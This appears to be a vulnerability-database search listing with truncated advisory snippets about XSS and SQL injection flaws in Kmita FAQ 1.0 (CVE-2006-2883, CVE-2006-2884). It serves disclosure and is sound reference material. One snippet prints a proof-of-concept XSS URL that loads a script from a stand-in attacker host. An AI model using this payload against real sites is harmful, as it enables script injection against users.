17 matches found
EUVD-2006-2880
Malware in sbrugna...
EUVD-2006-2881
Malware in sbrugna...
Kmita FAQ 1.0 index.php catid Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...
Kmita FAQ 1.0 search.php q Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...
Cross site scripting
Cross-site scripting XSS vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2884
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
Sql injection
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2006-2883
Cross-site scripting XSS vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2883
CVE-2006-2883 concerns a cross-site scripting (XSS) vulnerability in Kmita FAQ 1.0’s search.php. The issue allows remote attackers to inject arbitrary web script or HTML via the q parameter. The vulnerability affects the search function and is documented with a CVSS 2.0 base score of 4.3 (Medium)...
CVE-2006-2883
Cross-site scripting XSS vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2884
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2006-2884
CVE-2006-2884 is a SQL injection vulnerability in Kmita FAQ 1.0, triggered via the catid parameter in index.php. The affected component is Kmita FAQ 1.0’s index.php handling of catid, enabling remote attackers to execute arbitrary SQL commands. The vulnerability is rated HIGH (CVSS v2 base 7.5) w...
Kmita FAQ v1.0
Kmita FAQ v1.0 Homepage: http://www.kmita-faq.com Effected files: search.php index.php Search.php does not sanatize user input before dynamically genrating it. Proof of concept: http://www.example.com/search.php?q=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT SQL Injection proof of concept:...
Kmita FAQ 1.0 - 'index.php?catid' SQL Injection
source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...
Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting
source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...
Kmita FAQ 1.0 - index.php?catid SQL Injection
Kmita FAQ 1.0 - index.php?catid SQL Injection source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to...
Kmita FAQ 1.0 - search.php?q Cross-Site Scripting
Kmita FAQ 1.0 - search.php?q Cross-Site Scripting source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application t...